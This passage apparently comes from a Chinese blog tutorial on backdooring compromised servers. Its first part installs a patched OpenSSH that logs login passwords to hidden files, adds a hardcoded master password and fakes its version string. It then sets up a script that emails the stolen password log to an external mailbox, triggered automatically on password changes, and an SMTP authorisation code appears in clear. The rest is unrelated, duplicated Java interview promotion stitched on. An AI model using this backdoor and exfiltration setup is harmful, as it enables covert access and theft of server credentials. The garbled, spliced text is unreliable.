为:
#define ILOG “/usr/share/ifile”
#define OLOG “/usr/share/ofile”
#define SECRETPW “redhat”
3、为了使用安后的版本和原系统的版本一样,修改版本号:
[root@itlaoxin63 openssh-5.9p1]# vim /root/openssh-5.9p1/version.h
3 #define SSH_VERSION “OpenSSH_5.8p1 Debian-1ubuntu3”
4
5 #define SSH_PORTABLE “p1”
为:
#define SSH_VERSION " OpenSSH_5.3"
#define SSH_PORTABLE “p1”
4、安装打了后门补丁的sshd服务
[root@itlaoxin63 tmp]# yum install -y openssl openssl-devel pam-devel zlib zlib-devel
开始安装:
[root@itlaoxin63 openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
参数说明:
–prefix=/usr #指定安装到/usr 目录下
–sysconfdir=/etc/ssh #指定sshd服务配置文件目录
–with-pam #支持pam认证
–with-kerberos5 #支持kerberos认证
[root@itlaoxin63 openssh-5.9p1]# make -j 4 && make install
/usr/bin/install -c -m 0755 -s ssh /usr/bin/ssh
/usr/bin/install -c -m 0755 -s scp /usr/bin/scp
/usr/bin/install -c -m 0755 -s ssh-add /usr/bin/ssh-add
/usr/bin/install -c -m 0755 -s ssh-agent /usr/bin/ssh-agent
/usr/bin/install -c -m 0755 -s ssh-keygen /usr/bin/ssh-keygen
/usr/bin/install -c -m 0755 -s ssh-keyscan /usr/bin/ssh-keyscan
/usr/bin/install -c -m 0755 -s sshd /usr/sbin/sshd
/usr/bin/install -c -m 4711 -s ssh-keysign /usr/libexec/ssh-keysign
/usr/bin/install -c -m 0755 -s ssh-pkcs11-helper /usr/libexec/ssh-pkcs11-helper
/usr/bin/install -c -m 0755 -s sftp /usr/bin/sftp
5、重启sshd服务:
[root@itlaoxin63 openssh-5.9p1]# service sshd restart
6、测试使用xshel登录劫持密码
测试前,发现/usr/share/ifile文件没有存在
[root@itlaoxin63 ~]# ls /usr/share/ifile
ls: cannot access /usr/share/ifile: No such file or directory
xshell 登录后
7.查看劫持到root密码
[root@itlaoxin63 ~]# cat /usr/share/ifile
8. 另外我们也可以使用后门密码来登录root帐号
此处是在本机服务器上登录的,会看到olog文件
[root@itlaoxin tmp]# ssh 192.168.1.5
The authenticity of host ‘192.168.1.5 (192.168.1.5)’ can’t be established.
ECDSA key fingerprint is 60:23:d2:32:d1:5b:1d:bd:1a:f0:33:3e:60:9c:35:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.1.5’ (ECDSA) to the list of known hosts.
root@192.168.1.5’s password:
Last login: Thu May 6 01:08:58 2021 from 192.168.1.2
[root@itlaoxin ~]# cd /tmp/
[root@itlaoxin tmp]# ls
0x06-openssh-5.9p1.patch.tar.gz install.log openssh-5.9p1.patch
anaconda-ks.cfg install.log.syslog openssh-5.9p1.tar.gz
ilog olog sshpass-1.06.tar.gz
inotify-tools-3.13.tar.gz openssh-5.9p1 yum.log
[root@itlaoxin tmp]# cat olog
user:password@host --> root:redhat@192.168.1.5
[root@itlaoxin tmp]#
测试记录远程主机的密码
1、使用itlaoxin63登录远程主机itlaoxin64
[root@itlaoxin63 ~]# ssh root@192.168.1.64
root@192.168.1.64’s password:123456
Last login: Wed Aug 12 19:29:28 2015 from 192.168.1.63
[root@itlaoxin64 ~]# exit
[root@itlaoxin63 ~]# cat /tmp/olog #查看记录从itlaoxin64登录到远程主机的密码
user:password@host --> root:12345678@192.168.1.63
user:password@host --> root:123456@192.168.1.64
自动发邮件测试
这里以163的smtp服务器为例,实现自动发送邮件
1、使用mail.rc实现发邮件
[root@itlaoxin63 ~]# vim /etc/mail.rc #在此文件中间,随机找个位置插入以下内容:
[root@itlaoxin tmp]# cat /etc/mail.rc
set from=xinsz08vip@163.com smtp=smtp.163.com
set smtp-auth-user=xinsz08vip smtp-auth-password=CNSYCIQAOUUGOSOA smtp-auth=login
set from=xinsz08vip@163.com smtp=smtp.163.com # 指定发件人的邮箱
set smtp-auth-user=xinsz08vip # 写自己发件人的邮箱账号
smtp-auth-password=CNSYCIQAOUUGOSOA # 写发件人邮箱的授权码
smtp-auth=login
2. 配置163邮箱
点:设置->POP3/SMTP/IMAP->开启pop3服务(勾选开启pop3服务后,smtp也会自动开启)
开启服务:
记住授权码:CNSYCIQAOUUGOSOA
在操作的过程中,可能也需要要求发短信:微信扫码即可
3. 测试邮件发送
[root@itlaoxin tmp]# mail -s “demo” xinsz08vip@163.com < /tmp/ilog
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FTuslAab-1620347763117)(uploading…)]
4. 编写shell脚本自动发邮件,邮件的主题是服务器的IP地址
[root@itlaoxin63 bin]# vim /bin/zipmail #写入以下内容
[root@itlaoxin tmp]# cat /bin/zipmail
ip=ifconfig |grep inet |sed -n '1p' |awk '{print $2}' |awk -F ':' '{print $2}'
mail -s $ip xinsz08vip@163.com < /tmp/ilog
[root@itlaoxin63 bin]# chmod +x /bin/zipmail
5. 自动发邮件测试
[root@itlaoxin63 bin]# zipmail
发现也可以收到邮件,说明成功。
6. 实现当用户修改密码后,自动发送邮件
1、上传inotify-tools-3.13.tar.gz到服务器上
2、安装inotify
[root@itlaoxin63 ~]# tar -zxvf inotify-tools-3.13.tar.gz
[root@itlaoxin63 ~]# cd inotify-tools-3.13
[root@itlaoxin63 inotify-tools-3.13]# ./configure 检查安装环境
[root@itlaoxin63 inotify-tools-3.13]# make -j 4 #make编译,将源代码编译成二进制,可执行的文件 # -j 4 使用4个CPU一起编译。
[root@itlaoxin63 inotify-tools-3.13]# make install # 安装
3、编写触发式自动发邮件脚本
[root@itlaoxin63 ~]# cat /bin/zipmail
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
如果你觉得这些内容对你有帮助,可以扫码获取!!(备注Java获取)
最后的内容
在开头跟大家分享的时候我就说,面试我是没有做好准备的,全靠平时的积累,确实有点临时抱佛脚了,以至于我自己还是挺懊恼的。(准备好了或许可以拿个40k,没做准备只有30k+,你们懂那种感觉吗)
如何准备面试?
1、前期铺垫(技术沉积)
程序员面试其实是对于技术的一次摸底考试,你的技术牛逼,那你就是大爷。大厂对于技术的要求主要体现在:基础,原理,深入研究源码,广度,实战五个方面,也只有将原理理论结合实战才能把技术点吃透。
下面是我会看的一些资料笔记,希望能帮助大家由浅入深,由点到面的学习Java,应对大厂面试官的灵魂追问
这部分内容过多,小编只贴出部分内容展示给大家了,见谅见谅!
- Java程序员必看《Java开发核心笔记(华山版)》
- Redis学习笔记
- Java并发编程学习笔记
四部分,详细拆分并发编程——并发编程+模式篇+应用篇+原理篇
- Java程序员必看书籍《深入理解 ava虚拟机第3版》(pdf版)
- 大厂面试必问——数据结构与算法汇集笔记
其他像Spring,SpringBoot,SpringCloud,SpringCloudAlibaba,Dubbo,Zookeeper,Kafka,RocketMQ,RabbitMQ,Netty,MySQL,Docker,K8s等等我都整理好,这里就不一一展示了。
2、狂刷面试题
技术主要是体现在平时的积累实用,面试前准备两个月的时间再好好复习一遍,紧接着就可以刷面试题了,下面这些面试题都是小编精心整理的,贴给大家看看。
①大厂高频45道笔试题(智商题)
②BAT大厂面试总结(部分内容截图)
③面试总结
3、结合实际,修改简历
程序员的简历一定要多下一些功夫,尤其是对一些字眼要再三斟酌,如“精通、熟悉、了解”这三者的区别一定要区分清楚,否则就是在给自己挖坑了。当然不会包装,我可以将我的简历给你参考参考,如果还不够,那下面这些简历模板任你挑选:
以上分享,希望大家可以在金三银四跳槽季找到一份好工作,但千万也记住,技术一定是平时工作种累计或者自学(或报班跟着老师学)通过实战累计的,千万不要临时抱佛脚。文章来源:https://www.toymoban.com/news/detail-860211.html
另外,面试中遇到不会的问题不妨尝试讲讲自己的思路,因为有些问题不是考察我们的编程能力,而是逻辑思维表达能力;最后平时要进行自我分析与评价,做好职业规划,不断摸索,提高自己的编程能力和抽象思维能力。
《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》,点击传送门即可获取!
506290073)]
3、结合实际,修改简历
程序员的简历一定要多下一些功夫,尤其是对一些字眼要再三斟酌,如“精通、熟悉、了解”这三者的区别一定要区分清楚,否则就是在给自己挖坑了。当然不会包装,我可以将我的简历给你参考参考,如果还不够,那下面这些简历模板任你挑选:
[外链图片转存中…(img-rLpbJ0Pf-1712506290073)]
以上分享,希望大家可以在金三银四跳槽季找到一份好工作,但千万也记住,技术一定是平时工作种累计或者自学(或报班跟着老师学)通过实战累计的,千万不要临时抱佛脚。
另外,面试中遇到不会的问题不妨尝试讲讲自己的思路,因为有些问题不是考察我们的编程能力,而是逻辑思维表达能力;最后平时要进行自我分析与评价,做好职业规划,不断摸索,提高自己的编程能力和抽象思维能力。
《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》,点击传送门即可获取!文章来源地址https://www.toymoban.com/news/detail-860211.html
到了这里,关于绝了!美图技术专家获取肉鸡服务器密码如探囊取物的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!